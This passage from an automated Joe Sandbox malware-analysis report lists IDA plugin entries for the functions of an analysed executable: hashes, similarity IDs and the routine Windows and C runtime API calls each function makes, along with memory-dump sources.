                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                              • String ID: utf8
                                                                                                                                                                                                                                                              • API String ID: 3736152602-905460609
                                                                                                                                                                                                                                                              • Opcode ID: 83d2087403138c75d7e8cfc4be54d7da7de7e62d2020c05d05c4405acfc794ad
                                                                                                                                                                                                                                                              • Instruction ID: 25ed256d76517e65dc61e2a0a47033f12f9302e4b129ce77b540bce73abda994
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83d2087403138c75d7e8cfc4be54d7da7de7e62d2020c05d05c4405acfc794ad
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2F02232601109ABC714EBB8DD46EFA33ECDB48765F00417AFA02D7281EA38AD468B50
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00A117CA: GetLastError.KERNEL32(?,00000008,00A16C2A), ref: 00A117CE
                                                                                                                                                                                                                                                                • Part of subcall function 00A117CA: SetLastError.KERNEL32(00000000,00A27B20,00000024,00A0E406), ref: 00A11870
                                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00A1A54B,00000001,?,?,-00000050,?,00A1A8ED,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00A1A2B7
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2417226690-0
                                                                                                                                                                                                                                                              • Opcode ID: e9b000b751fb79ea06ec38197222e92a4b7505d25f98715c5e27d20963c8d4d9
                                                                                                                                                                                                                                                              • Instruction ID: bf67de1f2b1aaaf8f8e698a491618e7d831688a8e41eb056c0f9cbb50f86b803
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9b000b751fb79ea06ec38197222e92a4b7505d25f98715c5e27d20963c8d4d9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67F0F6362013045FDB145F75D881AFA7BD1EF81768B15882CFA464B6A0D6729C82C750
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00A0BC64: EnterCriticalSection.KERNEL32(-00A2A7C0,?,00A10BF6,00000000,00A278E0,0000000C,00A10BBD,00000000,?,00A122C0,00000000,?,00A11968,00000001,00000364,00000000), ref: 00A0BC73
                                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00A11AB5,00000001,00A279E0,0000000C,00A11EE4,00000000), ref: 00A11AFA
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1272433827-0
                                                                                                                                                                                                                                                              • Opcode ID: f1ec76283cb2cd7ac305b716a2dec28c569cc3a7229832bd077e537d527ab75e
                                                                                                                                                                                                                                                              • Instruction ID: 5d6bfc0e3dc45be1b22af4cfe0c461c8bb8c9f1000135bc04cb0323d4083b5e1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1ec76283cb2cd7ac305b716a2dec28c569cc3a7229832bd077e537d527ab75e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CEF04936A14204EFD710EFA8E942B9D77F0FB08720F10422AF5109B2E1DBB55942CF40
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00A117CA: GetLastError.KERNEL32(?,00000008,00A16C2A), ref: 00A117CE
                                                                                                                                                                                                                                                                • Part of subcall function 00A117CA: SetLastError.KERNEL32(00000000,00A27B20,00000024,00A0E406), ref: 00A11870
                                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00A1A0E0,00000001,?,?,?,00A1A94B,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00A1A1BE
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2417226690-0
                                                                                                                                                                                                                                                              • Opcode ID: ec1139b41f59152cf48501a7a3c96e87fbd4ea177bbb2e8cd08f7fed71b03279
                                                                                                                                                                                                                                                              • Instruction ID: a9f169c15ab12abdd2762a738810a6abd4b6bae35eecde91314c2c6dcbd1c7fb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec1139b41f59152cf48501a7a3c96e87fbd4ea177bbb2e8cd08f7fed71b03279
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22F0E53A34020567CB15AF75D8557EA7F95EFC17A0F068458EA058B291D6719883C790
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00A10761,?,20001004,00000000,00000002,?,?,00A0FD63), ref: 00A1201C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                                                                                                                                              • Opcode ID: 1d8b7cd73cd41bde41cff6852bbdcc184f246c5cf23a1990af8f8c821ef54655
                                                                                                                                                                                                                                                              • Instruction ID: 0a43546dba595d521a2c518116186f177458b663a3a79d197e635f33faefad44
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d8b7cd73cd41bde41cff6852bbdcc184f246c5cf23a1990af8f8c821ef54655
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3E01A31500168BBCF126FA1DC04ADE7A6AEF48760F008521FD0566121DB31CDA2AB94
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00006FBE,00A06622), ref: 00A06FB7
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                                                              • Opcode ID: 17472d9b63a66a6c5f044559e039a255fb51814418074b5ce22a856fd76a06c6
                                                                                                                                                                                                                                                              • Instruction ID: 542f76f4b06e8f3cb6c9a7f84b9bdc2fa3e80660682da8d06aaf07c00a927b8f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17472d9b63a66a6c5f044559e039a255fb51814418074b5ce22a856fd76a06c6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                                                                                                              • Opcode ID: 645e94ffdd4343ad5342ca20de8b52caa9b9b54d5cbe6946368ff24893d5c80b
                                                                                                                                                                                                                                                              • Instruction ID: 3084f46a73a9c50ef9f7a8ffd03054309264ea668cfe5ce8b6b9e4cc367bd9e5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 645e94ffdd4343ad5342ca20de8b52caa9b9b54d5cbe6946368ff24893d5c80b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7A01130200200CFA300CFFAAE082083AACAA8A2A0302C038A200C0220EB3080038F02
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3471368781-0
                                                                                                                                                                                                                                                              • Opcode ID: 882a083e5a11e777ef3bb4f402d93592e50d84e0d0a4c14526fe5343209cb6cc
                                                                                                                                                                                                                                                              • Instruction ID: 25a5ea22d1659fd20c77c1a5c34b8c8394f6685373f2a37a644036a03df04b92
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 882a083e5a11e777ef3bb4f402d93592e50d84e0d0a4c14526fe5343209cb6cc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33B1E7356007069FDB38EB25CCA2AF7B3E8EF54708F14456DE983C6580EA75A9C6C750
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: e47e57290291bf3e55fc76926b40b9455446aaecab0376499f589c11769486e1
                                                                                                                                                                                                                                                              • Instruction ID: ea3e4387b39ce806ce78312b7a9645757156f0a8d6b1af2c7d6898ca67931afe
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e47e57290291bf3e55fc76926b40b9455446aaecab0376499f589c11769486e1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77F03072900A19AFD714CFADD5415DFFBF8EB48320B10856ED4AAF3260D630FA458B51
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                                                                                                                                                                              • Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 00A09DD7
                                                                                                                                                                                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 00A09EE5
                                                                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00A0A037
                                                                                                                                                                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 00A0A052
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                                                              • API String ID: 2751267872-393685449
                                                                                                                                                                                                                                                              • Opcode ID: 36e47c1370719f9bd5a09bbec8d26e333aeca97840d1c3bdaac23dab6ecdc348
                                                                                                                                                                                                                                                              • Instruction ID: dcf55df2e0b06c0ba72eafd56c25aba1cb6fb603092c3d3f45bf8aa62b4f5279
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36e47c1370719f9bd5a09bbec8d26e333aeca97840d1c3bdaac23dab6ecdc348
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9B1487180020EEFCF25DFA4E9819AFBBB5BF14310F14855AE815AB293D731DA51CB92
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 0-3907804496
                                                                                                                                                                                                                                                              • Opcode ID: 5579ab0abf0469931f2714f6546004045c965fdc938b64e972be5070cf4d3cf0
                                                                                                                                                                                                                                                              • Instruction ID: 8db7a11d1cfeef2503637bddb7d8b7cccb9430c93a6cdf4e40d12e9f45fde423
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5579ab0abf0469931f2714f6546004045c965fdc938b64e972be5070cf4d3cf0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86B1E270E00649DFDB11DFA9D981BFD7BB6AF8A310F144158E451AB292C7709DC2CBA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetCPInfo.KERNEL32(01100520,01100520,?,7FFFFFFF,?,00A1CC63,01100520,01100520,?,01100520,?,?,?,?,01100520,?), ref: 00A1CA39
                                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00A1CAF4
                                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00A1CB83
                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00A1CBCE
                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00A1CBD4
                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00A1CC0A
                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00A1CC10
                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00A1CC20
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 127012223-0
                                                                                                                                                                                                                                                              • Opcode ID: 4443ca47ad5c254d0ff8882893cdb801f988195f333c8f1aa306781f8dae7f19
                                                                                                                                                                                                                                                              • Instruction ID: b28e4f1d1ab031dcb7321f24a0b91f4b602177cab47d148ca995fef8d57ce1eb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4443ca47ad5c254d0ff8882893cdb801f988195f333c8f1aa306781f8dae7f19
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E71F572984209ABDF219FA4CD82FFE77BA9F49374F280055E945E7281E6359CC0C7A1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00A063C9
                                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00A063F5
                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00A06434
                                                                                                                                                                                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A06451
                                                                                                                                                                                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00A06490
                                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00A064AD
                                                                                                                                                                                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A064EF
                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00A06512
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
